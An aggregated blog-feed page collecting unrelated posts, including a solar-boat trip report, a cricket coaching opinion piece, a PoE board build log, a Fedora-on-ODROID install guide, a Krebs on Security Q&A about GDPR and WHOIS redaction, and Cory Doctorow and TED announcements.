On a typical run upriver we measured 700W = 4kt, 300W = 3.1kt, 150W = 2.5kt, and 8A into the panels in full sun. Panel current dropped to 2A with cloud which was a nasty surprise. We experienced no shadowing issues from trees. The best current we saw at about noon was 10A. We could boost the current by 2A by putting three guys on one side of the boat and tipping the entire boat (and solar panels) towards the sun!

Even partial input from solar can have a big impact. Let’s say at 4 knots (30A) I can drive for 2 hours using 60% of my 100AH pack. If I back off the speed a little, so I’m drawing 20A, then 10A from the panels will extend my driving time to 6 hours.
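A quick sanity check of that arithmetic (nothing new here, just the figures from the paragraph above in runnable form):

# Usable charge is 60% of the 100 AH pack; endurance is usable charge
# divided by the net current draw (motor draw minus solar contribution).
my $usable_ah = 0.6 * 100;

printf "30 A draw, no solar:   %.1f hours\n", $usable_ah / 30;         # about 2 hours
printf "20 A draw, 10 A solar: %.1f hours\n", $usable_ah / (20 - 10);  # about 6 hours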

I slept on the boat, and one night I found a paddle steamer (the Murray Princess) parked across the river from me, all lit up with fairy lights:

On our final adventure, my friend Darin (VK5IX) and I were entering Lake Carlet, when suddenly the prop hit something very hard, “crack crack crack”. My poor prop shaft was bent and my propeller is wobbling from side to side:

We gently e-motored back and actually recorded our best results – 3 knots on 300W, 10A from the panels, 10A to the motor.

With 4 panels I would have a very practical solar boat, capable of 4-6 hours cruising a day just on solar power. The 2 extra panels could be mounted as a canopy over the rear of the boat. I have an idea about an extended solar adventure of several days, for example 150km from Younghusband to Goolwa.

Reading Further

Engage the Silent Drive
Lithium Cell Amp Hour Tester and Electric Sailing

Sam VargheseAppointing Justin Langer as coach will not solve Australia’s problems

In February, the Australian cricket team was in serious trouble after some players were caught cheating on the field.

The captain, vice-captain and the player who was the executor of the cheating that had been planned all lost their places and were ejected from cricket. Captain Steve Smith and vice-captain David Warner were banned for two years and Cameron Bancroft for nine months.

Coach Darren Lehmann retained his job but resigned soon thereafter.

The new coach, appointed recently, is Justin Langer. Through this appointment, Cricket Australia hopes to avoid any incidents that bring more disrepute on the team.

It would have been better if they had appointed former Test fast bowler Jason Gillespie. Langer, it may be recalled, tried to cheat during a Test match against Sri Lanka in 2004.

To quote from a published report: “In a bizarre incident, Langer brushed and dislodged a bail midway through the 80th over of Sri Lanka’s innings, an action he later described as unintentional. After left-handed batsman Hashan Tillakaratne completed a single to fine-leg, Australia’s fieldsmen crossed the pitch in preparation for the right-handed Thilan Samaraweera. Langer walked between the wicket and Samaraweera and broke the stumps with his hand.

“Later, Australian captain Ricky Ponting asked umpires Steve Bucknor and Dave Orchard about the fallen bail, but neither had seen Langer as he crossed the pitch. Accordingly, Bucknor and Orchard stopped play for three minutes while the matter was taken to third umpire Peter Manuel.

“Manuel ruled Tillakaratne not out. A reportedly upset Langer consulted team manager Steve Bernard during the lunch break, claiming to have been unaware that he was responsible for dislodging the bail.

“Bernard immediately relayed Langer’s sentiments to ICC match referee Chris Broad who, after receiving a report from the umpires at tea, charged the West Australian with a code of conduct breach. Broad later decided Langer had made an innocent mistake. However, he reminded the batsman to take more care in similar situations in the future.”

Langer is also the same man who denied he made contact with the ball when he nicked Wasim Akram to the keeper during a Test match in Hobart in 1999. Australia won that Test by six wickets, chasing down 350-plus.

In 2016, Langer admitted that he had cheated in that case too.

And the men who run cricket in Australia think he is the right man to coach the team, just after it was involved in a case of ball-tampering. Welcome to the new coach, a good likeness of the old one.

Here are some highlights of Lehmann’s cricketing career:

Jan 2003: Banned for five one-day internationals for racial outburst against Sri Lankans, calling them black cunts.

March 2006: Reprimanded for comments against Cricket Australia sponsors ING. “a 9.30am start, I don’t know how many times you have to say it. Thank God we might be changing sponsors. That might allow us to play at different times.”

July 2006: Censured by Yorkshire for making an obscene gesture to the crowd.

December 2012: Fined US$3000 and suspended for two years after questioning the bowling action of West Indian Marlon Samuels.

“He couldn’t bowl in the IPL last year. Yet he can bowl in the BBL. We’ve got to seriously look at what we’re doing. Are we here to play cricket properly or what?”

August 2013: Accused Stuart Broad of “Blatant cheating” during 2013 Ashes series. On Broad’s decision not to walk after edging to slip: “I just hope the Australian public give it to him right from the word go and I hope he cries and goes home.”

August 2013: Fined 20% of his match fee for his accusation against Broad.

April 2014: Admits that the 2003 racial outburst against Sri Lanka was the “biggest mistake of my life”.

March 2017: Lehmann defended Steve Smith after the then captain was caught on camera looking up to the pavilion for guidance before making a DRS call in Bangalore.

March 2018: Lehmann defended David Warner after the incident where the opener nearly came to blows with Quentin de Kock in the pavilion in Durban. On this he said: “There are things that cross the line and evoke emotion and you’ve got to deal with that. Both sides are going to push the boundaries. That’s part and parcel of Test match cricket.”

March 2018: Lehmann called Newlands’ crowd abuse “disgraceful” after Warner’s exchange with a fan.

March 2018: Resigns after ball tampering controversy.

The only thing left for Cricket Australia to do now is to appoint drug cheat Shane Warne to be the team’s adviser. That would be the clincher.

,

Planet Linux AustraliaJulien Goodwin: PoE termination board

For my next big project I'm planning on making it run using power over ethernet. Back in March I designed a quick circuit using the TI TPS2376-H PoE termination chip, and an LMR16020 switching regulator to drop the ~48v coming in down to 5v. There's also a second stage low-noise linear regulator (ST LDL1117S33R) to further drop it down to 3.3v, but as it turns out the main chip I'm using does its own 5->3.3v conversion already.

Because I was lazy, and the pricing was reasonable I got these boards manufactured by pcb.ng who I'd used for the USB-C termination boards I did a while back.

Here's the board running a Raspberry Pi 3B+, as it turns out I got lucky and my board is set up for the same input as the 3B+ supplies.



One really big warning: this is a non-isolated supply, which, in general, is a bad idea for PoE. For my specific use case there'll be no exposed connectors or metal, so this should be safe, but if you want to use PoE in general I'd suggest using some of the isolated convertors that are available with integrated PoE termination.

For this series I'm going to try and also make some notes on the mistakes I've made with these boards to help others, for this board:
  • I failed to add any test pins, given this was the first try I really should have, being able to inject power just before the switching convertor was helpful while debugging, but I had to solder wires to the input cap to do that.
  • Similarly, I should have had a 5v output pin, for now I've just been shorting the two diodes I had near the output which were intended to let me switch input power between two feeds.
  • The last, and the only actual problem with the circuit was that when selecting which exact parts to use I optimised by choosing the same diode for both input protection & switching, however this was a mistake, as the switcher needed a Schottky diode, and one with better ratings in other ways than the input diode. With the incorrect diode the board actually worked fine under low loads, but would quickly go into thermal shutdown if asked to supply more than about 1W. With the diode swapped to a correctly rated one it now supplies 10W just fine.
  • While debugging the previous I also noticed that the thermal pads on both main chips weren't well connected through. It seems the combination of via-in-thermal-pad (even tented), along with Kicad's normal reduction in paste in those large pads, plus my manufacturer's use of a fairly thin application of paste all contributed to this. Next time I'll probably avoid via-in-pad.


Coming soon will be a post about the GPS board, but I'm still testing bits of that board out, plus waiting for some missing parts (somehow not only did I fail to order 10k resistors, I didn't already have some in stock).

Planet Linux AustraliaChris Smart: Fedora on ODROID-HC1 mini NAS (ARMv7)

EDIT: I am having a problem where the Fedora kernel does not always detect the disk drive (whether cold, warm or hotplugged). I’ve built an upstream 4.16 kernel and it works perfectly every time. It doesn’t seem to be uas related; disabling that on the usb-storage module doesn’t make any difference. I’m looking into it…

Hardkernel is a Korean company that makes various embedded ARM based systems, which it calls ODROID.

One of their products is the ODROID-HC1, a mini NAS designed to take a single 2.5″ SATA drive (HC stands for “Home Cloud”) which comes with 2GB RAM and a Gigabit Ethernet port. There is also a 3.5″ model called the HC2. Both of these are based on the ODROID-XU4, which itself is based on the previous iteration ODROID-XU3. All of these are based on the Samsung Exynos5422 SOC and should work with the following steps.

The Exynos SOC needs proprietary first stage bootloaders which are embedded in the first 1.4MB or so at the beginning of the SD card in order to load U-Boot. As these binary blobs are not re-distributable, Fedora cannot support these devices out of the box, however all the other bits are available including the kernel, device tree and U-Boot. So, we just need to piece it all together and the result is a stock Fedora system!

To do this you’ll need the ODROID device, a power supply (5V/4A for HC1, 12V/2A for HC2), one of their UART adapters, an SD card (UHS-I) and probably a hard drive if you want to use it as a NAS (you may also want a battery for the RTC and a case).

ODROID-HC1 with UART, RTC battery, SD card and 2.5″ drive.

Note that the default Fedora 27 ARM image does not support the Realtek RTL8153 Ethernet adapter out of the box (it does after a kernel upgrade) so if you don’t have a USB Ethernet dongle handy we’ll download the kernel packages on our host, save them to the SD card and install them on first boot. The Fedora 28 image works out of the box, so if you’re installing 28 you can skip that step.

Download the Fedora Minimal ARM server image and save it in your home dir.

Install the Fedora ARM installer and U-Boot bootloader files for the device on your host PC.

sudo dnf install fedora-arm-installer uboot-images-armv7

Insert your SD card into your computer and note the device (mine is /dev/mmcblk0) using dmesg or df commands. Once you know that, open a terminal and let’s write the Fedora image to the SD card! Note that we are using none as the target because it’s not a supported board and we will configure the bootloader manually.

sudo fedora-arm-image-installer \
--target=none \
--image=Fedora-Minimal-armhfp-27-1.6-sda.raw.xz \
--resizefs \
--norootpass \
--media=/dev/mmcblk0

First things first, we need to enable the serial console and turn off cpuidle else it won’t boot. We do this by mounting the boot partition on the SD card and modifying the extlinux bootloader configuration.

sudo mount /dev/mmcblk0p2 /mnt
 
sudo sed -i "s|append|& cpuidle.off=1 \
console=tty1 console=ttySAC2,115200n8|" \
/mnt/extlinux/extlinux.conf

As mentioned, the kernel that comes with Fedora 27 image doesn’t support the Ethernet adapter, so if you don’t have a spare USB Ethernet dongle, let’s download the updates now. If you’re using Fedora 28 this is not necessary.

cd /mnt
 
sudo wget http://dl.fedoraproject.org/pub/fedora/linux/updates/27/armhfp/Packages/k/kernel-4.16.3-200.fc27.armv7hl.rpm \
http://dl.fedoraproject.org/pub/fedora/linux/updates/27/armhfp/Packages/k/kernel-core-4.16.3-200.fc27.armv7hl.rpm \
http://dl.fedoraproject.org/pub/fedora/linux/updates/27/armhfp/Packages/k/kernel-modules-4.16.3-200.fc27.armv7hl.rpm
 
cd ~/

Unmount the boot partition.

sudo umount /mnt

Now, we can embed U-Boot and the required bootloaders into the SD card. To do this we need to download the files from Hardkernel along with their script which writes the blobs (note that we are downloading the files for the XU4, not HC1, as they are compatible). We will tell the script to use the U-Boot image we installed earlier, this way we are using Fedora’s U-Boot not the one from Hardkernel.

Download the required files from Hardkernel.

mkdir hardkernel ; cd hardkernel
 
wget https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/sd_fusing.sh \
https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/bl1.bin.hardkernel \
https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/bl2.bin.hardkernel.720k_uboot \
https://raw.githubusercontent.com/hardkernel/u-boot/odroidxu4-v2017.05/sd_fuse/tzsw.bin.hardkernel
 
chmod a+x sd_fusing.sh

Copy the Fedora U-Boot files into the local dir.

cp /usr/share/uboot/odroid-xu3/u-boot.bin .

Finally, run the fusing script to embed the files onto the SD card, passing in the device for your SD card.
sudo ./sd_fusing.sh /dev/mmcblk0

That’s it! Remove your SD card and insert it into your ODROID, then plug the UART adapter into a USB port on your computer and connect to it with screen (check dmesg for the port number, generally ttyUSB0).

sudo screen /dev/ttyUSB0

Now power on your ODROID. If all goes well you should see the SOC initialise, load Fedora’s U-Boot and boot Fedora to the welcome setup screen. Complete this and then log in as root or your user you have just set up.

Welcome configuration screen for Fedora ARM.

If you’re running the Fedora 27 image, install the kernel updates, remove the RPMs and reboot the device (skip this if you’re running Fedora 28).
sudo dnf install --disablerepo=* /boot/*rpm
 
sudo rm /boot/*rpm
 
sudo reboot

Fedora login over serial connection.

Once you have rebooted, the Ethernet adapter should work and you can do your regular updates

sudo dnf update

You can find your SATA drive at /dev/sda where you should be able to partition, format, mount it, share it and well, do whatever you want with the box.

You may wish to take note of the IP address and/or configure static networking so that you can SSH in once you unplug the UART.

Enjoy your native Fedora embedded ARM Mini NAS 🙂

,

CryptogramFriday Squid Blogging: Bizarre Contorted Squid

This bizarre contorted squid might be a new species, or a previously known species exhibiting a new behavior. No one knows.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Krebs on SecuritySecurity Trade-Offs in the New EU Privacy Law

On two occasions this past year I’ve published stories here warning about the prospect that new European privacy regulations could result in more spams and scams ending up in your inbox. This post explains in a question and answer format some of the reasoning that went into that prediction, and responds to many of the criticisms leveled against it.

Before we get to the Q&A, a bit of background is in order. On May 25, 2018 the General Data Protection Regulation (GDPR) takes effect. The law, enacted by the European Parliament, requires companies to get affirmative consent for any personal information they collect on people within the European Union. Organizations that violate the GDPR could face fines of up to four percent of global annual revenues.

In response, the Internet Corporation for Assigned Names and Numbers (ICANN) — the nonprofit entity that manages the global domain name system — has proposed redacting key bits of personal data from WHOIS, the system for querying databases that store the registered users of domain names and blocks of Internet address ranges (IP addresses).

Under current ICANN rules, domain name registrars should collect and display a variety of data points when someone performs a WHOIS lookup on a given domain, such as the registrant’s name, address, email address and phone number. Most registrars offer a privacy protection service that shields this information from public WHOIS lookups; some registrars charge a nominal fee for this service, while others offer it for free.

But in a bid to help registrars comply with the GDPR, ICANN is moving forward on a plan to remove critical data elements from all public WHOIS records. Under the new system, registrars would collect all the same data points about their customers, yet limit how much of that information is made available via public WHOIS lookups.

The data to be redacted includes the name of the person who registered the domain, as well as their phone number, physical address and email address. The new rules would apply to all domain name registrars globally.

ICANN has proposed creating an “accreditation system” that would vet access to personal data in WHOIS records for several groups, including journalists, security researchers, and law enforcement officials, as well as intellectual property rights holders who routinely use WHOIS records to combat piracy and trademark abuse.

But at an ICANN meeting in San Juan, Puerto Rico last month, ICANN representatives conceded that a proposal for how such a vetting system might work probably would not be ready until December 2018. Assuming ICANN meets that deadline, it could be many months after that before the hundreds of domain registrars around the world take steps to adopt the new measures.

In a series of posts on Twitter, I predicted that the WHOIS changes coming with GDPR will likely result in a noticeable increase in cybercrime — particularly in the form of phishing and other types of spam. In response to those tweets, several authors on Wednesday published an article for Georgia Tech’s Internet Governance Project titled, “WHOIS afraid of the dark? Truth or illusion, let’s know the difference when it comes to WHOIS.”

The following Q&A is intended to address many of the more misleading claims and assertions made in that article.

Cyber criminals don’t use their real information in WHOIS registrations, so what’s the big deal if the data currently available in WHOIS records is no longer in the public domain after May 25?

I can point to dozens of stories printed here — and probably hundreds elsewhere — that clearly demonstrate otherwise. Whether or not cyber crooks do provide their real information is beside the point. ANY information they provide — and especially information that they re-use across multiple domains and cybercrime campaigns — is invaluable to both grouping cybercriminal operations and in ultimately identifying who’s responsible for these activities.

To understand why data reuse in WHOIS records is so common among crooks, put yourself in the shoes of your average scammer or spammer — someone who has to register dozens or even hundreds or thousands of domains a week to ply their trade. Are you going to create hundreds or thousands of email addresses and fabricate as many personal details to make your WHOIS listings that much harder for researchers to track? The answer is that those who take this extraordinary step are by far and away the exception rather than the rule. Most simply reuse the same email address and phony address/phone/contact information across many domains as long as it remains profitable for them to do so.

This pattern of WHOIS data reuse doesn’t just extend across a few weeks or months. Very often, if a spammer, phisher or scammer can get away with re-using the same WHOIS details over many years without any deleterious effects to their operations, they will happily do so. Why they may do this is their own business, but nevertheless it makes WHOIS an incredibly powerful tool for tracking threat actors across multiple networks, registrars and Internet epochs.

All domain registrars offer free or a-la-carte privacy protection services that mask the personal information provided by the domain registrant. Most cybercriminals — unless they are dumb or lazy — are already taking advantage of these anyway, so it’s not clear why masking domain registration for everyone is going to change the status quo by much. 

It is true that some domain registrants do take advantage of WHOIS privacy services, but based on countless investigations I have conducted using WHOIS to uncover cybercrime businesses and operators, I’d wager that cybercrooks more often do not use these services. Not infrequently, even when they do use WHOIS privacy options, there are gaps in coverage at some point in the domain’s history (such as when a registrant switches hosting providers) that are indexed by historic WHOIS records and offer a brief window of visibility into the details behind the registration.

This is demonstrably true even for organized cybercrime groups and for nation state actors, and these are arguably some of the most sophisticated and savvy cybercriminals out there.

It’s worth adding that if so many cybercrooks seem nonchalant about adopting WHOIS privacy services it may well be because they reside in countries where the rule of law is not well-established, or their host country doesn’t particularly discourage their activities so long as they’re not violating the golden rule — namely, targeting people in their own backyard. And so they may not particularly care about covering their tracks. Or in other cases they do care, but nevertheless make mistakes or get sloppy at some point, as most cybercriminals do.

The GDPR does not apply to businesses — only to individuals — so there is no reason researchers or anyone else should be unable to find domain registration details for organizations and companies in the WHOIS database after May 25, right?

It is true that the European privacy regulations as they relate to WHOIS records do not apply to businesses registering domain names. However, the domain registrar industry — which operates on razor-thin profit margins and which has long sought to be free of any WHOIS requirements or accountability whatsoever — won’t exactly trip over itself to add more complexity to its WHOIS processes just to make a distinction between businesses and individuals.

As a result, registrars simply won’t make that distinction, because there is no mandate that they must. They’ll just adopt the same WHOIS data collection and display policies across the board, regardless of whether the WHOIS details for a given domain suggest that the registrant is a business or an individual.

But the GDPR only applies to data collected about people in Europe, so why should this impact WHOIS registration details collected on people who are outside of Europe?

Again, domain registrars are the ones collecting WHOIS data, and they are most unlikely to develop WHOIS record collection and dissemination policies that seek to differentiate between entities covered by GDPR and those that may not be. Such an attempt would be fraught with legal and monetary complications that they simply will not take on voluntarily.

What’s more, the domain registrar community tends to view the public display of WHOIS data as a nuisance and a cost center. They have mainly allowed public access to WHOIS data only because ICANN’s contracts require it. So, from the registrar community’s point of view, the less information they must make available to the public, the better.

Like it or not, the job of tracking down and bringing cybercriminals to justice falls to law enforcement agencies — not security researchers. Law enforcement agencies will still have unfettered access to full WHOIS records.

As it relates to inter-state crimes (i.e., the bulk of all Internet abuse), law enforcement — at least in the United States — is divided into two main components: the investigative side (i.e., the FBI and Secret Service) and the prosecutorial side (the state and district attorneys who actually initiate court proceedings intended to bring an accused person to justice).

Much of the legwork done to provide the evidence needed to convince prosecutors that there is even a case worth prosecuting is performed by security researchers. The reasons why this is true are too numerous to delve into here, but the safe answer is that law enforcement investigators typically are more motivated to focus on crimes for which they can readily envision someone getting prosecuted — and because very often their plate is full with far more pressing, immediate and local (physical) crimes.

Admittedly, this is a bit of a blanket statement because in many cases local, state and federal law enforcement agencies will do this often tedious legwork of cybercrime investigations on their own — provided it involves or impacts someone in their jurisdiction. But due in large part to these jurisdictional issues, politics and the need to build prosecutions around a specific locality when it comes to cybercrime cases, very often law enforcement agencies tend to miss the forest for the trees.

Who cares if security researchers will lose access to WHOIS data, anyway? To borrow an assertion from the Internet Governance article, “maybe it’s high time for security researchers and businesses that harvest personal information from WHOIS on an industrial scale to refine and remodel their research methods and business models.”

This is an alluring argument. After all, the technology and security industries claim to be based on innovation. But consider carefully how anti-virus, anti-spam or firewall technologies currently work. The unfortunate reality is that these technologies are still mostly powered by humans, and those humans rely heavily on access to key details about domain reputation and ownership history.

Those metrics for reputation weigh a host of different qualities, but a huge component of that reputation score is determining whether a given domain or Internet address has been connected to any other previous scams, spams, attacks or other badness. We can argue about whether this is the best way to measure reputation, but it doesn’t change the prospect that many of these technologies will in all likelihood perform less effectively after WHOIS records start being heavily redacted.
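
As a deliberately simplified illustration of how such a score might lean on WHOIS-derived signals, consider the toy function below; the features, weights and values are invented for this example and are not taken from any real anti-spam or anti-abuse product. The point it illustrates is that once the registrant email is redacted, the reuse signal collapses to zero for every domain.

    # Toy reputation score: features and weights are invented for illustration.
    def domain_risk_score(domain_age_days, registrant_email_reuse_count,
                          prior_blocklist_hits, uses_privacy_service):
        score = 0.0
        if domain_age_days < 30:                               # freshly registered domains are riskier
            score += 0.3
        score += min(registrant_email_reuse_count, 10) * 0.05  # reused WHOIS contact details
        score += min(prior_blocklist_hits, 5) * 0.1            # past abuse history
        if uses_privacy_service:
            score += 0.05                                      # weak signal on its own
        return min(score, 1.0)

    # A week-old domain whose registrant email shows up on eight other domains,
    # two of which were previously blocklisted:
    print(domain_risk_score(7, 8, 2, False))  # -> 0.9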

Don’t advances in artificial intelligence and machine learning obviate the need for researchers to have access to WHOIS data?

This sounds like a nice idea, but again it is far removed from current practice. Ask anyone who regularly uses WHOIS data to determine reputation or to track and block malicious online threats and I’ll wager you will find the answer is that these analyses are still mostly based on manual lookups and often thankless legwork. Perhaps such trendy technological buzzwords will indeed describe the standard practice of the security industry at some point in the future, but in my experience this does not accurately depict the reality today.

Okay, but Internet addresses are pretty useful tools for determining reputation. The sharing of IP addresses tied to cybercriminal operations isn’t going to be impacted by the GDPR, is it? 

That depends on the organization doing the sharing. I’ve encountered at least two cases in the past few months wherein European-based security firms have been reluctant to share Internet address information at all in response to the GDPR — based on a perceived (if not overly legalistic) interpretation that somehow this information also might be considered personally identifying data. This reluctance to share such information out of a concern that doing so might land the sharer in legal hot water can indeed have a chilling effect on the important sharing of threat intelligence across borders.

According to the Internet Governance article, “If you need to get in touch with a website’s administrator, you will be able to do so in what is a less intrusive manner of achieving this purpose: by using an anonymized email address, or webform, to reach them (The exact implementation will depend on the registry). If this change is inadequate for your ‘private detective’ activities and you require full WHOIS records, including the personal information, then you will need to declare to a domain name registry your specific need for and use of this personal information. Nominet, for instance, has said that interested parties may request the full WHOIS record (including historical data) for a specific domain and get a response within one business day for no charge.”

I’m sure this will go over tremendously with both the hacked sites used to host phishing and/or malware download pages and the people who get phished or served with malware in the added time it will take to relay and approve said requests.

According to a Q3 2017 study (PDF) by security firm Webroot, the average lifespan of a phishing site is between four and eight hours. How is waiting 24 hours before being able to determine who owns the offending domain going to be helpful to either the hacked site or its victims? It also doesn’t seem likely that many other registrars will volunteer for this 24-hour turnaround duty — and indeed no others have publicly demonstrated any willingness to take on this added cost and hassle.

I’ve heard that ICANN is pushing for a delay in the GDPR as it relates to WHOIS records, to give the registrar community time to come up with an accreditation system that would grant vetted researchers access to WHOIS records. Why isn’t that a good middle ground?

It might be, if ICANN hadn’t dragged its heels in taking the GDPR seriously until perhaps the past few months. As it stands, the experts I’ve interviewed see little prospect of such a system being ironed out or gaining the necessary traction among the registrar community anytime soon. Most of them predict that the Internet community will still be debating how to create such an accreditation system a year from now.

Hence, it’s not likely that WHOIS records will continue to be anywhere near as useful to researchers in a month or so as they were previously. And this reality will continue for many months to come — if indeed some kind of vetted WHOIS access system is ever envisioned and put into place.

After I registered a domain name using my real email address, I noticed that address started receiving more spam emails. Won’t hiding email addresses in WHOIS records reduce the overall amount of spam I can expect when registering a domain under my real email address?

That depends on whether you believe any of the responses to the questions above. Will that address be spammed by people who try to lure you into paying them to register variations on that domain, or to entice you into purchasing low-cost Web hosting services from some random or shady company? Probably. That’s exactly what happens to almost anyone who registers a domain name that is publicly indexed in WHOIS records.

The real question is whether redacting all email addresses from WHOIS will result in overall more bad stuff entering your inbox and littering the Web, thanks to reputation-based anti-spam and anti-abuse systems failing to work as well as they did before GDPR kicks in.

It’s worth noting that ICANN created a working group to study this exact issue, which noted that “the appearance of email addresses in response to WHOIS queries is indeed a contributor to the receipt of spam, albeit just one of many.” However, the report concluded that “the Committee members involved in the WHOIS study do not believe that the WHOIS service is the dominant source of spam.”

Do you have something against people not getting spammed, or against better privacy in general? 

To the contrary, I have worked the majority of my professional career to expose those who are doing the spamming and scamming. And I can say without hesitation that an overwhelming percentage of that research has been possible thanks to data included in public WHOIS registration records.

Is the current WHOIS system outdated, antiquated and in need of an update? Perhaps. But scrapping the current system without establishing anything in between while laboring under the largely untested belief that in doing so we will achieve some kind of privacy utopia seems myopic.

If opponents of the current WHOIS system are being intellectually honest, they will make the following argument and stick to it: By restricting access to information currently available in the WHOIS system, whatever losses or negative consequences on security we may suffer as a result will be worth the cost in terms of added privacy. That’s an argument I can respect, if not agree with.

But for the most part that’s not the refrain I’m hearing. Instead, what this camp seems to be saying is that if you’re not on board with the WHOIS changes that will be brought about by the GDPR, then there must be something wrong with you, and in any case, here are a bunch of thinly-sourced reasons why the coming changes might not be that bad.

Rondam RamblingsCredit where it's due

Richard Nixon is rightfully remembered as one of the great villains of American democracy.  But he wasn't all bad.  He opened relations with China, appointed four mostly sane Supreme Court justices, and oversaw the establishment of the EPA among many other accomplishments.  Likewise, I believe that Donald Trump will eventually go down in history as one of the worst (if not the worst) president

Rondam RamblingsAn open letter to Jack Phillips

[Jack Phillips is the owner of the Masterpiece Cake Shop in Lakewood, Colorado.  Mr. Phillips is being sued by the Colorado Civil Rights Commission for refusing to make a wedding cake for a gay couple.  His case is currently before the U.S. Supreme Court.  Yesterday Mr. Phillips published an op-ed in The Washington Post to which this letter is a response.] Dear Mr. Phillips: Imagine your child

Rondam RamblingsPaul Ryan forces out House chaplain

Just in case there was the slightest ember of hope in your mind that Republicans actually care about religious freedom and are not just odious hypocritical power-grubbing opportunists, this should extinguish it once and for all: House Chaplain Patrick Conroy’s sudden resignation has sparked a furor on Capitol Hill, with sources in both parties saying he was pushed out by Speaker Paul Ryan (R-Wis

CryptogramTSB Bank Disaster

This seems like an absolute disaster:

The very short version is that a UK bank, TSB, which had been merged into and then many years later was spun out of Lloyds Bank, was bought by the Spanish bank Banco Sabadell in 2015. Lloyds had continued to run the TSB systems and was to transfer them over to Sabadell over the weekend. It's turned out to be an epic failure, and it's not clear if and when this can be straightened out.

It is bad enough that the bank’s IT problems have been so severe and protracted that a major newspaper, The Guardian, created a live blog for it that has now been running for two days.

The more serious issue is that customers still can’t access their online accounts and, even more disconcerting, are sometimes being allowed into other people’s accounts, which says there are massive problems with data integrity. That’s a nightmare to sort out.

Even worse, the fact that this situation has persisted strongly suggests that Lloyds went ahead with the migration without allowing for a rollback.

This seems to be a mistake, and not enemy action.

Worse Than FailureError'd: Billboards Show Obvious Disasters

"Actually, this board is outside a casino in Sheffield which is next to the church, but we won't go there," writes Simon.

 

Wouter wrote, "The local gas station is now running ads for Windows 10 updates."

 

"If I were to legally change my name to a GUID, this is exactly what I'd pick," Lincoln K. wrote.

 

Robert F. writes, "Copy/Paste? Bah! If you really want to know how many log files are being generated per server, every minute, you're going to have to earn it by typing out this 'easy' command."

 

"I imagine someone pushed the '10 items or fewer' rule on the self-checkout kiosk just a little too far," Michael writes.

 

Wojciech wrote, "To think - someone actually doodled this JavaScript code!"

 


,

Cory DoctorowRaleigh-Durham, I’m headed your way! CORRECTED!

CORRECTION! The Flyleaf event is at 6PM, not 7!

I’m delivering the annual Kilgour lecture tomorrow morning at 10AM at UNC, and I’ll be speaking at Flyleaf Books at 6PM — be there or be oblong!

Also, if you’re in Boston, Waterloo or Chicago, you can catch me in the coming weeks!

Abstract: For decades, regulators and corporations have viewed the internet and the computer as versatile material from which special-purpose tools can be fashioned: pornography distribution systems, jihadi recruiting networks, video-on-demand services, and so on.

But the computer is an unprecedented general purpose device capable of running every program we can express in symbolic language, and the internet is the nervous system of the 21st century, webbing these pluripotent computers together.

For decades, activists have been warning regulators and corporations about the peril in getting it wrong when we make policies for these devices, and now the chickens have come home to roost. Frivolous, dangerous and poorly thought-through choices have brought us to the brink of electronic ruin.

We are balanced on the knife-edge of peak indifference — the moment at which people start to care and clamor for action — and the point of no return, the moment at which it’s too late for action to make a difference. There was never a more urgent moment to fight for a free, fair and open internet — and there was never an internet more capable of coordinating that fight.

Cory DoctorowLittle Brother is 10 years old today: I reveal the secret of writing future-proof science fiction


It’s been ten years since the publication of my bestselling novel Little Brother; though the novel was written more than a decade ago, and though it deals with networked computers and mobile devices, it remains relevant, widely read, and widely cited even today.

In an essay for Tor.com, I write about my formula for creating fiction about technology that stays relevant — the secret is basically to assume that people will be really stupid about technology for the foreseeable future.

And now we come to how to write fiction about networked computers that stays relevant for 12 years and 22 years and 50 years: just write stories in which computers can run all the programs, and almost no one understands that fact. Just write stories in which authority figures, and mass movements, and well-meaning people, and unethical businesses, all insist that because they have a *really good reason* to want to stop some program from running or some message from being received, it *must* be possible.

Write those stories, and just remember that because computers can run every program and the internet can carry any message, every device will someday be a general-purpose computer in a fancy box (office towers, cars, pacemakers, voting machines, toasters, mixer-taps on faucets) and every message will someday be carried on the public internet. Just remember that the internet makes it easier for people of like mind to find each other and organize to work together for whatever purpose stirs them to action, including terrible ones and noble ones. Just remember that cryptography works, that your pocket distraction rectangle can scramble messages so thoroughly that they can never, ever be descrambled, not in a trillion years, without your revealing the passphrase used to protect them. Just remember that swords have two edges, that the universe doesn’t care how badly you want something, and that every time we make a computer a little better for one purpose, we improve it for every purpose a computer can be put to, and that is all purposes.


Just remember that declaring war on general purpose computing is a fool’s errand, and that that never stopped anyone.


Ten Years of Cory Doctorow’s Little Brother [Cory Doctorow/Tor.com]


(Image: Missy Ward, CC-BY)

TEDTED hosts first-ever TED en Español Spanish-language speaker event at NYC headquarters

Thursday, April 26, 2018 – Today marks the first-ever TED en Español speaker event hosted by TED in its New York City office. The all-Spanish daytime event, held in TED’s theater in Manhattan, will feature eight speakers, a musical performance, five short films and fifteen 1-minute talks given by members of the audience. 150 people are expected to attend from around the world, and about 20 TEDx events in 10 countries plan to tune in to watch remotely.

The New York event is just the latest addition to TED’s sweeping new Spanish-language TED en Español initiative, designed to spread ideas to the global Hispanic community. Led by TED’s Gerry Garbulsky, also head of the world’s largest TEDx event – TEDxRiodelaPlata in Argentina – TED en Español includes a Facebook community, Twitter feed, weekly “Boletín” newsletter, YouTube channel and – as of earlier this month – an original podcast created in partnership with Univision Communications.

“As part of our nonprofit mission at TED, we work to find and spread the best ideas no matter where the speakers live or what language they speak,” said Gerry. “We want everyone to have access to ideas in their own language. Given the massive global Hispanic population, we’ve begun the work to bring Spanish-language ideas directly to Spanish-speaking audiences, and today’s event is a major step in solidifying our commitment to that effort.”

Today’s speakers include chef Gastón Acurio, futurist Juan Enriquez, entrepreneur Leticia Gasca, data scientist César A. Hidalgo, founder and funder Rebeca Hwang, ocean expert Enric Sala, assistant conductor of the LA Philharmonic Paolo Bortolameolli, and psychologist and dancer César Silveyra. Musical group LADAMA will perform.